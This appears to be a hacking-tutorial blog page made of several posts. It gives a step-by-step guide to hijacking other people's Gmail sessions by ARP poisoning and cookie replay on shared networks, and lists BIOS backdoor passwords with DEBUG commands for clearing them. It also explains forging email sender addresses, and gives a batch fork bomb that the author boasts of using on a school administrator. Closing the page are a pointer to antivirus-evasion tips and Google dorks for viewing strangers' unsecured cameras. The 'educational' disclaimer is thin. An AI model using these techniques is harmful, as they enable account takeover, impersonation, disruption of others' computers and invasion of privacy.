Hacking Gmail account using GX Cookie

Disclaimer: This post is only for educational purpose.

Introduction

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:

• You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.


• You know basic networking.

Tool used for this attack:

• Cain & Abel


• Network Miner


• Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,

If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).

• Start Cain from Start > Program > Cain > Cain


• Click on Start/Stop Sniffer tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.


• Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.

How to check your physical IP ?

> Click on start > Run type cmd and press enter, in the command prompt type

Ipconfig and enter. This should show your IP address assign to your PC.

It will have following outputs:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

• Click on Configure > APR > Use Spoofed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

• Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.

• Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

• Open Network Miner by clicking its exe (pls note it requires .Net framework to work).


• From the “—Select network adaptor in the list—“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.

Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

• Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.


• Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon

Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.

• Open Firefox and log in your gmail email account.


• from firefox click on Tools > cookie Editor.


• In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.


• From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.


• Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?

Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.

Settings > Browser connection > Always use https

Read More

A Port Scanner in VB

A small but effective tool (if you know the right way to use it..you might do wonders..)

——————–

you need:

2 textboxes

1 listbox

3 commandbuttons

1 timer

1 winsock control

——————–

 
 
Private Sub Command1_Click() 
  Timer1.Enabled = True 
End Sub 
 
Private Sub Command2_Click() 
  Timer1.Enabled = False 
  Text2.Text = "0" 
End Sub 
 
Private Sub Command3_Click() 
  List1.Clear 
End Sub 
 
Private Sub Timer1_Timer() 
  On Error Resume Next 
  Winsock1.Close 
  Text2.Text = Int(Text2.Text) + 1 
  Winsock1.RemoteHost = Text1.Text 
  Winsock1.RemotePort = Text2.Text 
  Winsock1.Connect 
End Sub 
 
Private Sub Winsock1_Connect() 
 List1.AddItem Winsock1.RemotePort & " is open!" 
End Sub
 
 

——————–

Explanation:

text1 = IP to scan

text2 = starting port

list1 = list where all open ports are shown

command1 = start

command2 = stop and reset

command3 = clear port list

timer1 = will make the winsock control to try ports

Read More

Basic BIOS password crack

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:

Get DOS prompt and type:

Code:

DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter

Restart the computer. It works on most versions of the AWARD BIOS.

Accessing information on the hard disk

When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords:

AWARD BIOS

AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet

AMI BIOS

AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

Note that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards (such as Italian and German ones), so — for example — you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software

If you have access to the computer when it’s turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don’t have one of those programs when you have access to the computer, so you’d better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:

AMI/AWARD BIOS

Code:

O 70 17
O 71 17
Q

PHOENIX BIOS

Code:

O 70 FF
O 71 17
Q

GENERIC

Invalidates CMOS RAM.

Should work on all AT motherboards

(XT motherboards don’t have CMOS)

Code:

O 70 2E
O 71 FF
Q

Note that the first letter is a “O” not the number “0″. The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware

If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for “switching a jumper” I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard’s manual.

Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don’t have the motherboard’s manual, you’ll have to “brute force” it… trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don’t know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can remove the battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.

Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip

Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.

Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.

CHIPS P82C206 (square)

Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).

Code:

       gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32

OPTi F82C206 (rectangular)

Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).

Code:

    80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26

Dallas DS1287, DS1287A

Benchmarq bp3287MT, bq3287AMT

The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can’t flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.

CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can’t be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.

Code:

         __________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15
    11 -|          |-  14
gnd 12 -|__________|-  13

NOTE: Although these are 24-pin chips,

the Dallas chips may be missing 5 pins,

these are unused pins.

Most chips have unused pins,

though usually they are still present.

Dallas DS12885S

Benchmarq bq3258S

Hitachi HD146818AP

Samsung KS82C6818A

This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.

Short together pins 12 and 24.

Code:

5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd

Motorola MC146818AP

Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.

Code:

          __________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13

Replacing the chip

If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It’s a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you’ll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you’ll then plug the new chip, in the eventuality that you’ll have to change it again. If you can’t find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer’s website to see if there’s the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important

Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.

Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you’ll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .

Key Disk for Toshiba laptops

Some Toshiba notebooks allow to bypass BIOS by inserting a “key-disk” in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it’s not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for “KEY” followed by two zeroes). Once you have created the key disk put it into the notebook’s drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You’ll enter the BIOS configuration where you can set a new password.

Key protected cases

A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

Read More

How to send fake email / Email Forging

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorized access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1?

4. Set port to “25?

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer.This step is very important to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3. Click on it to enlarge

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.

220 Welcome to QK SMTP Server 3

helo hacker (Type helo & any name followed by space)

250 Hello hacker (Server Welcomes You)

mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)

250 billg@microsoft.com Address Okay (Server gives a positive response)

rcpt to:admin@gmail.com (Type any valid recipient email address)

250 admin@gmail.com Address Okay (Server gives a positive response)

data (type this command to start input data)

354 Please start mail input

From:Gates <billg@microsoft.com>

To:admin@gmail.com

Date:Sat Jan 5,2008 9:45 PM

Subject:Test to send fake email

You can create as many headers followed by the “:” symbol.

NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the email is ready for sending)

quit (Type this command to quit from server)

221 Closing connection. Good bye.

Connection to host lost

(You will get the above 2 lines of message after typing “quit” command)

(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****

Read More

How to make a Fork Bomb (Rabbit Virus)

Introduction

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!

Read More

How to make a Virus File Undetected By Antivirus Programs

This video tutorial explains you in detail “how to make an infected file undetectable” just by doing some splitting and hexing!!

Read More

How to Hack into a Live Security Camera

Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just google these following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:

• inurl:”CgiStart?page=”


• inurl:/view.shtml


• intitle:”Live View / – AXIS


• inurl:view/view.shtml


• inurl:ViewerFrame?Mode=


• inurl:ViewerFrame?Mode=Refresh


• inurl:axis-cgi/jpg


• inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)


• inurl:view/indexFrame.shtml


• inurl:view/index.shtml


• inurl:view/view.shtml


• liveapplet


• intitle:”live view” intitle:axis


• intitle:liveapplet


• allintitle:”Network Camera NetworkCamera” (disconnected)


• intitle:axis intitle:”video server”


• intitle:liveapplet inurl:LvAppl


• intitle:”EvoCam” inurl:”webcam.html”


• intitle:”Live NetSnap Cam-Server feed”


• intitle:”Live View / – AXIS”


• intitle:”Live View / – AXIS 206M”


• intitle:”Live View / – AXIS 206W”


• intitle:”Live View / – AXIS 210?


• inurl:indexFrame.shtml Axis


• inurl:”MultiCameraFrame?Mode=Motion” (disconnected)


• intitle:start inurl:cgistart


• intitle:”WJ-NT104 Main Page”


• intitle:snc-z20 inurl:home/


• intitle:snc-cs3 inurl:home/


• intitle:snc-rz30 inurl:home/


• intitle:”sony network camera snc-p1?


• intitle:”sony network camera snc-m1?


• site:.viewnetcam.com -www.viewnetcam.com


• intitle:”Toshiba Network Camera” user login


• intitle:”netcam live image” (disconnected)


• intitle:”i-Catcher Console – Web Monitor”

Happy Cam Hacking Guys!!

Read More